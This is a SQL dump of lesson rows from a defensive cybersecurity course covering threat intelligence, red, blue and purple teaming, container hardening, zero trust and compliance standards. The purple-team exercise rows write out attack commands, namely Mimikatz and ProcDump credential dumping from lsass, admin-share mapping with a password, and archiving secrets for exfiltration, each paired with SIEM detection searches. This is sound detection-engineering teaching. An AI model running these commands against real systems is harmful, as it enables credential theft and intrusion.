(678, 395, '## Operationalizing Intel\n\nIntel is useless if it sits in a PDF. It must \"Drive Operations\".\n\n### 1. Alert Enrichment (Context)\n*   **Without Intel**: SIEM Alert \"Connection to 1.2.3.4\". Priority: Unknown.\n*   **With Intel**: SIEM Alert \"Connection to 1.2.3.4 (Known Conti Ransomware Node)\". Priority: **CRITICAL**.\n*   *How*: Connect your SIEM to a TIP.\n\n### 2. Retroactive Hunting\n*   Intel Report: \"In Jan 2024, Actor X used `evil.com`.\"\n*   Today is March 2024. Blocking it now helps, but...\n*   **Action**: Search your *Historical Logs* (Cold Storage). Did anyone talk to `evil.com` back in January?\n    *   If Yes: You have been compromised for 3 months. **Incident Response Start**.\n\n### 3. Vulnerability Prioritization\n*   Scanner says: \"You have 10,000 unpatched bugs.\"\n*   Intel says: \"Only CVE-2023-1234 is being actively exploited in the wild by Ransomware.\"\n*   **Action**: Patch CVE-2023-1234 *tonight*. The rest can wait.\n\n### 4. TTP-Based Defense\n*   Intel says: \"Lazarus is using LNK files in ZIP Archives.\"\n*   **Action**: Update Email Gateway to block `.lnk` attachments. Update EDR to alert on `cmd.exe` spawned from `explorer.exe` via LNK.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(679, 396, '## Module 39 Review\nThreat Intel gives you the \"Heads Up\".\n*   **Lifecycle**: Planning to Feedback.\n*   **Standards**: STIX (Language) / TAXII (Truck).\n*   **Attribution**: The Diamond Model.\n\nNext: Testing your defenses with Red and Purple Teams.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 14:23:36'),
(680, 401, '## Red, Blue, and Purple Teams\n\nThe color spectrum of information security.\n\n### Red Team (The Offensive)\n*   **Goal**: Simulate a real adversary to test defenses.\n*   **Mindset**: \"There is always a way in.\"\n*   **Method**: Zero-day exploits, Phishing, Social Engineering, Physical Intrusion.\n*   **Outcome**: A report saying \"We stole the Domain Admin password in 4 hours.\"\n\n### Blue Team (The Defensive)\n*   **Goal**: Detect and Respond.\n*   **Mindset**: \"Protect the Crown Jewels.\"\n*   **Method**: SIEM, EDR, Firewalls, Patching, Threat Hunting.\n*   **Outcome**: \"We blocked the Phishing email. We detected the scanner.\"\n\n### Purple Team (The Collaborative)\n*   **The Problem**: Red Teams and Blue Teams often hate each other.\n    *   Red: \"Blue team is useless, I pwned them easily.\"\n    *   Blue: \"Red team cheated, they used a vulnerability in a system we don\'t own.\"\n    *   *Result*: No learning happens.\n*   **The Solution**: Purple Teaming.\n    *   Red Team executes an attack (T1059 PowerShell).\n    *   Blue Team watches *in real-time*.\n    *   Red: \"Did you see that?\"\n    *   Blue: \"No.\"\n    *   Red: \"Okay, I will run it again. Tune your SIEM to look for X.\"\n    *   Blue: \"Got it! Alert triggered.\"\n\n### Why Purple is the Future\nIt moves from \"Win/Lose\" to \"Improvement\". The goal isn\'t to hack the company; the goal is to verify the detection logic.', 'markdown', 20, '2025-12-27 02:22:23', '2025-12-29 16:15:02'),
(681, 402, '## Red Team Operations\n\nRed Teaming is not just \"Running Nmap\". It is a full-scope simulation.\n\n### 1. Reconnaissance (OSINT)\n*   Scraping LinkedIn to find system admins.\n*   Looking for leaked credentials on the Dark Web.\n*   Mapping external IP ranges (Shodan).\n\n### 2. Weaponization & Delivery\n*   Creating custom malware (avoiding signature detection).\n*   Buying a look-alike domain (`cornpany.com`).\n*   Sending the Spearphishing email.\n\n### 3. Exploitation & Install\n*   User clicks link.\n*   Browser exploit runs.\n*   Beacon (C2) installed.\n\n### 4. Privilege Escalation\n*   Local Admin -> Domain Admin.\n*   Techniques: Kerberoasting, PrintNightmare.\n\n### 5. Lateral Movement\n*   Moving from \"Bob from Accounting\" to the \"Swift Payment Server\".\n\n### 6. Actions on Objectives\n*   Stealing the money. Encrypting the drive.\n\n### Rules of Engagement (ROE)\nA legal contract defining what Red Team is allowed to do.\n*   **Limits**: \"Do not attack the Production Database.\" \"Do not phish the CEO.\"\n*   **Emergency Contact**: If Red Team accidentally crashes a server, who do they call at 3 AM?', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(682, 403, '## Blue Team Defense\n\nThe Blue Team has the harder job. The Red Team only needs to be right *once*. The Blue Team needs to be right *every time*.\n\n### 1. Prevention (Hardening)\n*   \"Reduce the attack surface.\"\n*   Disable macros.\n*   Patch vulnerabilities.\n*   Enforce MFA.\n\n### 2. Detection (Monitoring)\n*   SIEM rules.\n*   Honeypots (Traps).\n*   Canary Tokens (Fake files that alert when opened).\n\n### 3. Response (IR)\n*   The fire brigade.\n\n### The \"Assume Breach\" Mentality\nModern Blue Teams assume the perimeter has failed. They focus on **Internal Monitoring**.\n*   \"I don\'t care if they get in. I care if they can move to the database without me seeing them.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(683, 404, '## Purple Team Exercises\n\nA structured Purple Team exercise follows a script.\n\n### Phase 1: Planning\n*   **Objective**: \"Verify detection of Credential Dumping (T1003).\"\n*   **Tool**: Mimikatz.\n*   **Target**: Test Workstation A.\n\n### Phase 2: Execution (Round 1)\n*   Red: Runs `mimikatz.exe privilege::debug`.\n*   Blue: Checks SIEM. \"No Alert.\"\n*   Red: \"Okay, running `sekurlsa::logonpasswords`.\"\n*   Blue: \"No Alert.\"\n\n### Phase 3: Tuning\n*   Blue: \"Why did we miss it?\"\n    *   Investigation: \"We don\'t ingest Sysmon Event ID 10 (Process Access).\"\n*   **Fix**: Enable Sysmon config. Forward logs to Splunk. Write Search.\n\n### Phase 4: Execution (Round 2)\n*   Red: Runs `mimikatz.exe`.\n*   Blue: \"ALERT! Critical Severity - Credential Dumping detected.\"\n*   **Verdict**: Success.\n\n### Phase 5: Reporting\n*   \"We improved detection coverage for T1003 from 0% to 100%.\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(684, 405, '## Adversary Emulation\n\nRather than \"Generic Hacking\", we emulate specific Threat Groups.\n\n### Why?\n*   If you are a Bank, you care about **Carbanak**.\n*   If you are a Hospital, you care about **Ryuk**.\n\n### Tools\n1.  **Atomic Red Team (Red Canary)**: A library of simple scripts to test one technique.\n    *   `atomic-red-team.exe T1003` -> Runs a safe mimikatz command.\n2.  **CALDERA (MITRE)**: Automated adversary emulation platform.\n    *   Build a \"Profile\" (e.g., APT29).\n    *   Click \"Start\".\n    *   Caldera agents connect to C2 and execute the APT29 commands automatically.\n\n### The Value\nIt proves resilience against *relevant* threats.\n\"We know we can stop script kiddies. But can we stop the group that hacked our competitor last week?\"', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 16:15:03'),
(685, 406, '## Module 40 Review\n*   **Red**: Attack.\n*   **Blue**: Defend.\n*   **Purple**: Collaborate.\n*   Adversary Emulation ensures your defense is relevant to real-world threats.\n\nNext: Running a Purple Team exercise step-by-step.', 'markdown', 20, '2025-12-27 02:22:24', '2025-12-29 14:23:36'),
(686, 411, '## Exercise Framework Setup\n\nTo run a Purple Team exercise in your lab or company, you don\'t need expensive tools.\n\n### 1. The Target\nA standard Windows 10/11 VM.\n*   **Requirement**: It must have logging enabled (Sysmon) and forwarding to your SIEM.\n\n### 2. The Attack Tool\n**Atomic Red Team** is the gold standard for beginners.\n*   It is a folder of YAML files.\n*   Each file contains a command (PowerShell/CMD).\n*   No C2 infrastructure needed. It runs locally.\n\n### 3. The Execution\n*   Install `Invoke-AtomicRedTeam` (PowerShell module).\n*   Command: `Invoke-AtomicTest T1003 -CheckPrereqs`\n*   Command: `Invoke-AtomicTest T1003` (Runs the attack).\n\n### 4. The Tracker\nUse a spreadsheet (VECTR is a good free tool, but Excel works).\n*   Columns: Technique | Status | Detected? | Blocked? | Notes.\n*   Fill it out as you go.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(687, 412, '## Exercise: Credential Dumping (T1003)\n\n**Objective**: Detect extraction of passwords from memory.\n\n### The Attack (Atomic T1003.001)\n*   **Command**: `procdump -ma lsass.exe lsass_dump.dmp`\n*   **Context**: `lsass.exe` (Local Security Authority Subsystem Service) holds active credentials in RAM.\n*   **Tool**: Sysinternals ProcDump (legitimate Microsoft tool).\n\n### The Detection\n1.  **Process Name**: `procdump.exe` or `procdump64.exe`.\n2.  **Target Process**: `lsass.exe`.\n3.  **Command Line**: Contains `lsass`.\n\n### SIEM Search (Splunk)\n`index=windows EventCode=10 TargetImage=\"*lsass.exe\" GrantedAccess=\"0x1F0FFF\"`\n(Event 10 is Process Access. 0x1F0FFF is Full Access).\n\n### The Fix\nIf you missed it:\n1.  Install Sysmon.\n2.  Configure Sysmon to log Event ID 10 for Target `lsass.exe`.\n3.  Ingest logs.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(688, 413, '## Exercise: Lateral Movement (T1021)\n\n**Objective**: Detect movement between machines using SMB/Windows Admin Shares.\n\n### The Attack (Atomic T1021.002)\n*   **Command**: `net use \\TargetIPC$ /user:Admin Pa$$word`\n*   **Context**: Mapping the C: drive of a remote computer.\n\n### The Detection\n1.  **Event ID**: 4624 (Logon) Type 3 (Network).\n2.  **Event ID**: 5140 (Share Access).\n3.  **Share Name**: `\\*C$`, `\\*ADMIN$`, `\\*IPC$`.\n\n### SIEM Search\n`index=windows EventCode=5140 ShareName=\"*C$\" AccountName!=\"*$\" `\n(Exclude computer accounts ending in $).\n\n### Analysis\nWhy is \"Mary\" mapping the C$ drive of \"Bob\"?\n*   If Mary is HelpDesk -> Maybe okay.\n*   If Mary is HR -> **Malicious**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(689, 414, '## Exercise: Data Exfiltration (T1048)\n\n**Objective**: Detect data leaving the network.\n\n### The Attack\n*   **Command**: Compress a folder into a ZIP and send it to an external FTP/HTTP server.\n*   **Atomic**: `7z a -t7z -mx=9 stolen_data.7z C:UsersPublicSecrets*`\n\n### The Detection\n1.  **Archiving**: Event 4688 (Process Create) -> `7z.exe` or `rar.exe` or `tar.exe`.\n    *   *Suspicious*: Running from a Temp directory.\n2.  **Network**: Firewall allow log to a non-business IP.\n    *   High Upload volume (> 10 MB).\n\n### SIEM Search\n`index=firewall action=allow bytes_out > 10000000 dest_port NOT IN (80, 443)`\n(Looking for FTP, SSH, or odd ports).\n\n### The Fix\n*   Block outbound connections on servers by default.\n*   Alert on large archive creation.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(690, 415, '## Metrics & Reporting\n\nHow do you prove Purple Teaming works?\n\n### The Scorecard\n*   **Detection Rate**: \"We detected 5/10 attacks (50%).\" -> \"Next month: 8/10 (80%).\"\n*   **Data Quality**: \"We had logs for 9/10 attacks, but no rule.\"\n*   **Alert Fidelity**: \"We had an alert, but it was classified as \'Info\' instead of \'Critical\'.\"\n\n### The Executive Report\n\"We simulated a Ransomware attack.\n*   Result: We successfully blocked execution.\n*   Gap: It took us 4 hours to detect the initial phishing email.\n*   Plan: Tune email gateway filter.\"\n\nThis creates a dashboard of **Continuous Improvement**.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 16:15:03'),
(691, 416, '## Module 41 Review\nYou simulated an attack chain:\n*   Credentials Stolen -> Lateral Movement -> Exfiltration.\n*   You validated detections.\n\nNext: Modern security in Containers and Cloud.', 'markdown', 20, '2025-12-27 02:26:00', '2025-12-29 14:23:36'),
(692, 421, '## Container Security Fundamentals\n\n\"But it works on my machine!\" - The Developer.\n\n### What is a Container?\nA container (Docker) is a lightweight package of software that includes everything needed to run it: code, runtime, system tools, libraries.\n*   **Advantage**: Portability. It runs the same on a laptop as in the cloud.\n*   **Difference from VM**: It shares the **Host Kernel**. A VM has its own Kernel.\n    *   *Security Implication*: If you escape a VM, you hit the Hypervisor. If you escape a Container, you are on the Host Linux OS itself, potentially as root.\n\n### The Attack Surface\n1.  **The Image**: Is the software (Nginx, Python) vulnerable?\n2.  **The Registry**: Where do you download images from? (Docker Hub).\n3.  **The Orchestrator**: Kubernetes (K8s) configuration.\n4.  **The Runtime**: The Docker daemon running on the host.\n\n### Ephemeral Nature\nContainers live for minutes.\n*   **SOC Nightmare**: \"Alert: TCP scan from Container ID a1b2c3d4.\"\n*   Analyst checks 10 minutes later. Container a1b2c3d4 is gone. Deleted.\n*   *Solution*: You need specialized Container Security tools that log events *instantly* to a central database.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(693, 422, '## Docker Security Hardening\n\nDocker is not secure by default.\n\n### 1. Rootless Mode\n*   **Risk**: By default, the Docker daemon runs as **root**.\n*   **Fix**: Configure Docker to run in \"Rootless Mode\" (User Namespace Remapping).\n*   *Why*: If a hacker breaks out of the container, they are \"nobody\" on the host, not \"root\".\n\n### 2. Capabilities (Linux Capabilities)\n*   Linux decomposes \"Root\" privileges into small slices (CAP_NET_ADMIN, CAP_SYS_BOOT, etc.).\n*   **Hardening**: Drop all capabilities, then add back only what you need.\n    *   `docker run --cap-drop=all --cap-add=NET_BIND_SERVICE ...`\n\n### 3. Read-Only Filesystem\n*   Containers should be **Immutable**. You shouldn\'t patch a running container; you deploy a new one.\n*   **Flag**: `--read-only`.\n*   *Why*: Attackers cannot download malware or modify `/etc/passwd`.\n\n### 4. Do not expose the Docker Socket\n*   `/var/run/docker.sock` is the API key to the kingdom. If you mount this into a container, that container has full root control over the host.\n*   **Rule**: Never mount the socket unless absolutely necessary (e.g., for a monitoring agent).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(694, 423, '## Kubernetes Security (K8s)\n\nKubernetes manages thousands of containers. It is complex (\"K8s is hard\").\n\n### 1. The API Server\nThe brain of K8s. Port 6443.\n*   **Attack**: If this is open to the internet with no auth, anyone can delete your cluster.\n*   **Fix**: Private access only.\n\n### 2. RBAC (Role-Based Access Control)\n*   **Service Accounts**: Every pod has an identity.\n*   **Risk**: Default Service Account often has too many permissions.\n*   **Fix**: Create specific ServiceAccounts. \"This Web Pod can ONLY talk to the Database Pod.\"\n\n### 3. Pod Security Standards (PSS)\n*   **Privileged Pods**: A pod with `privileged: true` is basically a root shell on the host.\n*   **Policy**: Use OPA Gatekeeper or Kyverno to **Block** any deployment that asks for `privileged: true`.\n\n### 4. Network Policies\n*   By default, in K8s, **all pods can talk to all pods**. (Flat network).\n*   **Attack**: Hacker compromises Web Pod. Moves laterally to Database Pod easily.\n*   **Fix**: Implement Network Policies (Firewall rules) to deny traffic by default.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(695, 424, '## Container Image Security\n\n\"Supply Chain Security.\"\n\n### Scanning Images\nBefore you deploy, scan the image.\n*   **Tools**: Trivy, Grype, Clair.\n*   **Process**: CI/CD Pipeline.\n    *   Developer commits code.\n    *   Jenkins builds image.\n    *   Trivy scans image.\n    *   If `Critical Vulnerabilities > 0`: **Fail Build**. (Do not deploy).\n    *   Else: Deploy.\n\n### Minimal Base Images\n*   **Bloat**: Using `ubuntu:latest` (700MB) includes Curl, Wget, Netcat, Grep. Hackers love these tools (\"Living off the Land\").\n*   **Minimal**: Using `alpine` (5MB) or Google `distroless`.\n    *   Contains *only* the application binary. No Shell. No Curl.\n    *   *Result*: Beating the hacker by removing their weapons.\n\n### Signing Images (Notary)\nHow do you know this image actually came from your developer and wasn\'t injected by a hacker?\n*   **Cosign / Notary**: Digitally sign images. Kubernetes verifies the signature before running.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(696, 425, '## Runtime Protection\n\nScanning images is \"Static\". We also need \"Dynamic\" protection (EDR for Containers).\n\n### Falco (The Runtime Camera)\n**Falco** is an open-source tool (CNCF) that watches the Kernel.\n*   **Rule**: \"Alert if a Shell is spawned in a container.\"\n*   **Rule**: \"Alert if a container modifies `/etc/shadow`.\"\n*   **Rule**: \"Alert if a container connects to a crypto-mining pool.\"\n\n### Sidecars\nSecurity tools often run as a \"Sidecar\" container next to the main app container in the same Pod. They share the network view and can inspect localhost traffic.\n\n### eBPF (Extended Berkeley Packet Filter)\nThe modern magic technology.\n*   Allows running sandboxed programs in the Linux Kernel without changing kernel source code.\n*   **Cilium / Tetragon**: Use eBPF to monitor network and process execution with near-zero performance overhead.\n*   This is the future of Linux security.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(697, 426, '## Module 42 Review\n*   **Containers**: Shared Kernel = High Risk.\n*   **Roots**: Avoid running as Root.\n*   **Images**: Scan before you run.\n*   **Runtime**: Watch for drift and shells (`Falco`).\n\nNext: Zero Trust (The modern architecture).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 14:24:24'),
(698, 431, '## Zero Trust Principles\n\n\"Never Trust. Always Verify.\"\n\n### The Old Model: Castle and Moat\n*   Hard shell (Firewall). Soft gooey center (Internal Network).\n*   If you VPN in, you are \"Trusted\". You can access everything.\n\n### The Zero Trust Model\n*   Assume the network is **Hostile**.\n*   Assume the attacker is **already inside**.\n*   Therefore: Verify *every single request*.\n    1.  **Identity**: Who are you? (MFA).\n    2.  **Device**: Is your laptop patched? (Health).\n    3.  **Context**: Are you in a weird location?\n    4.  **Resource**: Do you need access to *this specific* file?\n\n### Pillars of Zero Trust (CISA)\n1.  **Identity**: Users.\n2.  **Devices**: Endpoints.\n3.  **Network**: Segmentation.\n4.  **Applications**: Workloads.\n5.  **Data**: Encryption/Tagging.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(699, 432, '## Identity as the Perimeter\n\nThe new firewall is the Login Screen.\n\n### Authentication vs Authorization\n*   **AuthN**: Who are you? (MFA).\n*   **AuthZ**: What can you do? (Roles).\n\n### The Signal\nZero Trust creates a \"Risk Signal\" based on context:\n*   **User**: Is Bob.\n*   **Device**: Corporate Laptop (Managed).\n*   **Location**: Office IP.\n*   **Behavior**: Normal hours.\n*   **Result**: Allow Access.\n\n*   **Change**: Bob logs in from an unmanaged iPad in Russia.\n*   **Result**: Block (even if password is correct).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(700, 433, '## Microsegmentation\n\nThe technique to stop Lateral Movement.\n\n### Concept\nInstead of one big \"Internal\" VLAN, break the network into tiny islands.\n*   **Macro-Segmentation**: VLANs. (HR, Finance, IT).\n*   **Micro-Segmentation**: Host-level firewalls.\n    *   \"Server A can talk to Server B on Port 443.\"\n    *   \"Server A can talk to Server C on Port 3306.\"\n    *   \"Server A **cannot** talk to Server D.\"\n\n### Implementation\n1.  **Tagging**: Map the application flow. \"Web calls App calls DB\".\n2.  **Policy**: Write \"Allow\" rules for valid flows.\n3.  **Default Deny**: Block everything else.\n\n### The Effect\nIf an attacker compromises the Web Server, they are trapped in a small padded cell. They cannot scan the network (blocked). They cannot SSH to the DB (blocked).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(701, 434, '## Continuous Verification\n\nTrust is ephemeral.\n\n### Posture Checks\nBefore granting access, check the device health.\n*   Is the OS patched?\n*   Is EDR running?\n*   Is Disk Encrypted?\nIf NO -> Quarantine the device until fixed.\n\n### Session Times\n*   **Old**: Login lasts 30 days.\n*   **Zero Trust**: Login lasts 1 hour. Or 15 minutes for critical apps.\nRe-verify constantly.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(702, 435, '## Implementation\n\nHow do we actually build this?\n\n1.  **Define Protect Surface**: Identify the critical data (DAAS - Data, Assets, Applications, Services).\n2.  **Map Transaction Flows**: How does data move today? (Who talks to whom?).\n3.  **Build Policy**: Write the \"Allow\" rules based on business need.\n4.  **Monitor**: Watch logs.\n5.  **Enforce**: Turn on blocking mode.\n\n*Warning*: Don\'t turn on blocking on Day 1. You will break production.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(703, 436, '## Module 43 Review\n*   **Identity**: The core control.\n*   **Context**: Time, Device, Location.\n*   **Segmentation**: Keeping zones small.\n\nNext: Compliance (The rules we must follow).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(704, 441, '## Security Frameworks Overview\n\nWhy do we follow frameworks?\n1.  **Guidance**: Don\'t reinvent the wheel. Best practices exist.\n2.  **Compliance**: It\'s the law (or contract).\n3.  **Trust**: Customers trust you if you have a badge (ISO/SOC2).\n\n### Types\n*   **Regulatory**: HIPAA (Health), GDPR (Privacy). Essential.\n*   **Voluntary**: NIST CSF, CIS Controls. Best practice.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(705, 442, '## NIST Cybersecurity Framework (CSF)\n\nThe gold standard for US organizations.\n\n### The 5 Functions\n1.  **Identify**: Asset Management, Risk Assessment. \"Know what you have.\"\n2.  **Protect**: Access Control, Awareness, Data Security. \"Lock the doors.\"\n3.  **Detect**: Anomalies, Monitoring. \"Install cameras.\"\n4.  **Respond**: Mitigation, Analysis. \"Call the fire department.\"\n5.  **Recover**: Planning, Improvements. \"Rebuild.\"\n\n*(2.0 added \"Govern\" as the 6th function).*', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(706, 443, '## ISO 27001 & 27002\n\nThe International Standard.\n\n### ISMS (Information Security Management System)\nISO 27001 focuses on the **Management System**, not just the tech.\n*   \"Do you have a process to identify risks?\"\n*   \"Do you have management support?\"\n*   \"Do you continuously improve?\"\n\n### Annex A (Controls)\nList of 114 specific controls in the 2013 edition (Access Control, Cryptography, Physical Security); the 2022 revision consolidated Annex A into 93 controls.\n*   You don\'t have to implement all of them, but you must explain why if you exclude one (Statement of Applicability - SOA).\n\n### Usage\n*   Common in Europe and Asia.\n*   Rigorous certification process.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(707, 444, '## SOC 2 Compliance\n\n**SOC 2 (Service Organization Control 2)** is the gold standard for SaaS companies.\n\n### The Trust Services Criteria (TSC)\n1.  **Security** (Mandatory): Firewalls, IDS, MFA.\n2.  **Availability**: Uptime, DR.\n3.  **Processing Integrity**: Data is accurate.\n4.  **Confidentiality**: Encryption.\n5.  **Privacy**: Consents.\n\n### Type 1 vs Type 2\n*   **Type 1**: \"Design\". A snapshot in time. \"On Jan 1st, they had a firewall.\"\n*   **Type 2**: \"Operating Effectiveness\". Observation over 6-12 months. \"For the entire year, they kept the firewall running and reviewed logs daily.\"\n*   *Note*: Enterprise customers demand SOC 2 Type 2 reports.\n\n### The Analyst\'s Role\nEvidence Collection.\n*   Auditor: \"Prove you review access logs.\"\n*   Analyst: \"Here is the ticket #1234 where I reviewed the logs.\"', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(708, 445, '## PCI-DSS & HIPAA\n\n### PCI-DSS (Payment Card Industry Data Security Standard)\n*   **Scope**: Anyone who stores, processes, or transmits credit card (cardholder) data.\n*   **Rules**: Very technical.\n    *   \"Install a firewall.\"\n    *   \"Encrypt data in transit.\"\n    *   \"Use Anti-Virus.\"\n\n### HIPAA (Health Insurance Portability and Accountability Act)\n*   **Scope**: US Healthcare (Hospitals, Insurance) and their business associates.\n*   **Focus**: Protecting PHI (Protected Health Information).\n*   **Rule**: More flexible/vague than PCI, but huge fines for breaches.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(709, 446, '## Module 44 Review\n*   **NIST CSF**: The operational guide (Identify -> Recover).\n*   **ISO 27001**: The management standard.\n*   **SOC 2**: The SaaS standard.\n*   **PCI/HIPAA**: The industry laws.\n\nYou have completed Path 4: Advanced SOC & Threat Hunting.\nYou are now ready to tackle the hardest challenges in Cyber Defense.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(978, 765, '## What is Cyber Threat Intelligence?\n\n**Cyber Threat Intelligence (CTI)** is evidence-based knowledge, including context, mechanisms, indicators, implications, and action-oriented advice about an existing or emerging menace or hazard to assets.\n\nIn simpler terms: **CTI is the art of knowing your enemy.**\n\nIt transforms raw data into a narrative that helps you make better security decisions. It answers questions like:\n*   \"Who is attacking us?\"\n*   \"Why are they attacking us?\"\n*   \"How do they get in?\"\n*   \"What are they after?\"\n\n---\n\n### The Pyramid of Value\nTo understand CTI, you must understand the difference between Data, Information, and Intelligence.\n\n#### 1. Data (The Raw Material)\nData is simple, raw indicators. It has no context.\n*   **Example**: `IP Address: 192.168.1.5` or `Hash: a1b2c3d4...`\n*   **Value**: Low. Seeing an IP address tells you nothing about *why* it is there or if it is bad.\n\n#### 2. Information (Processed)\nInformation is data that has been aggregated or enriched. It answers \"What is this?\"\n*   **Example**: \"The IP `192.168.1.5` belongs to a known VPN provider and was seen scanning port 445 on our firewall.\"\n*   **Value**: Medium. You know what it is, but not if it\'s a targeted threat.\n\n#### 3. Intelligence (Actionable Insight)\nIntelligence is the analysis of information to provide specific direction. It answers \"What should we do?\"\n*   **Example**: \"APT29 is actively using the VPN IP `192.168.1.5` to exploit the Log4j vulnerability in financial institutions to deploy Cobalt Strike. **Recommendation**: Block this IP and patch Log4j immediately.\"\n*   **Value**: High. This captures the intent, the capability, and the necessary action.\n\n> 💡 **Key Takeaway**: If you cannot act on it, it is not intelligence; it is just news.\n\n---\n\n### Why Do We Need CTI?\nMany organizations operate in a functional \"Firefighting\" mode—reacting to alerts as they happen. 
CTI shifts this to a **Proactive** stance.\n\n#### 1. Proactive Defense (The \"Hunt\")\nInstead of waiting for the SIEM to beep, CTI tells us what to look for. If we know a specific ransomware group uses \"RDP Brute Force\" followed by \"PsExec\", we can go *look* for those signs before the ransomware is deployed.\n\n#### 2. Decision Advantage\nSecurity budgets are finite. CTI helps leaders decide where to spend money.\n*   *Without CTI*: \"We need to fix everything.\" (Impossible).\n*   *With CTI*: \"Our threat landscape is dominated by Phishing and Ransomware. We should invest 80% of our budget in Email Security and Offline Backups, and less on physical security.\"\n\n#### 3. Alert Triage\nA SOC Analyst sees 1,000 alerts a day. Which one matters?\nCTI provides the context. An alert for \"Powershell Execution\" might be normal for a SysAdmin. But CTI tells us: \"This specific Powershell command matches the exact syntax used by the Emotet Trojan.\" Suddenly, that alert becomes Priority 1.\n\n---\n\n### Case Study: The Target Breach (2013)\nOne of the most famous examples of failed intelligence.\n*   **The Attack**: Hackers compromised a third-party HVAC vendor just to get into Target\'s network.\n*   **The Warning**: FireEye (security vendor) detected the malware and flagged it.\n*   **The Failure**: Target\'s security team saw the alert but ignored it because they lacked the **Strategic Intelligence** to understand that retail was being aggressively targeted by POS (Point of Sale) RAM scrapers.\n*   **The Result**: 40 million credit cards stolen. CEO fired.\n*   **Lesson**: Detection tools are not enough. You need the intelligence to understand the *severity* and *context* of what you are seeing.\n\n---\n\n### Summary\n*   **Data** is raw numbers. **Information** is context. 
**Intelligence** is actionable advice.\n*   CTI moves you from **Reactive** (Firefighting) to **Proactive** (Hunting).\n*   The goal is to reduce risk and speed up response times.', 'markdown', NULL, '2025-12-29 13:30:44', '2025-12-29 13:41:22'),
(979, 766, '## The Intelligence Cycle\n\nIntelligence does not just \"happen.\" It is the result of a rigorous, repeatable process called the **Intelligence Cycle**. This 6-step loop ensures that the intel produced effectively meets the needs of the consumer.\n\n---\n\n### Phase 1: Direction (Planning)\nThis is the most critical phase. Before you collect a single log, you must ask: **\"What do we want to know?\"**\n*   **Defining Requirements**: We create **Intelligence Requirements (IRs)**.\n    *   *Bad IR*: \"Tell me about hackers.\" (Too vague).\n    *   *Good IR*: \"Is our organization vulnerable to the specific ransomware strains currently targeting the healthcare sector?\"\n*   **Stakeholders**: Who needs this? The CISO? The SOC? The Patch team?\n\n### Phase 2: Collection\nGathering the raw data to answer the question.\n*   **Internal Sources**: Firewall logs, EDR telemetry, SIEM events, past incident reports.\n*   **External Sources (OSINT)**: Twitter, Github, News reports, Pastebin.\n*   **Closed Sources**: Dark web forums, paid vendor feeds (e.g., CrowdStrike, Mandiant), ISACs (Information Sharing and Analysis Centers).\n\n### Phase 3: Processing\nRaw data is often unusable (messy, encrypted, or foreign language). Processing turns it into a readable format.\n*   **Normalization**: Converting 10 different log formats into one standard (like JSON or STIX).\n*   **Translation**: Translating Russian forum posts into English.\n*   **Decryption**: Decrypting malware configs.\n*   **Filtering**: Throwing away the noise (false positives) to focus on the signal.\n\n### Phase 4: Analysis\nThis is the \"Brain\" of the operation. 
Analysts connect the dots.\n*   **Correlation**: \"We saw this file hash in our network, and this report says it belongs to APT28.\"\n*   **Attribution**: \"Based on the TTPs, we assess with High Confidence this is a state-sponsored attack.\"\n*   **Assessment**: \"What does this mean for us?\" The analyst validates the truthfulness of the data and estimates the potential impact.\n*   **Structured Analytic Techniques (SATs)**: Methods like \"Analysis of Competing Hypotheses\" are used to avoid cognitive biases (like Confirmation Bias).\n\n### Phase 5: Dissemination\nDelivering the finished product to the right person, in the right format, at the right time.\n*   **Strategic**: A 1-page PDF summary for the CEO. (No technical jargon).\n*   **Tactical**: A machine-readable list of IOCs (STIX/TAXII) pushed directly to the Firewall.\n*   **Operational**: A detailed report on TTPs for the Threat Hunting team.\n*   **Rule of Thumb**: \"The right intel to the wrong person is useless.\"\n\n### Phase 6: Feedback\nThe cycle closes. Did we answer the question?\n*   \"Was this report helpful?\"\n*   \"Did it lead to a detection?\"\n*   \"Was it too late?\"\n*   Based on feedback, we adjust our **Direction** for the next cycle. If the SOC says \"These IOCs were all false positives,\" we need to change our Collection or Analysis phase.\n\n---\n\n### Summary\nThe cycle never stops. As threats evolve, our requirements change, and the wheel keeps turning.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
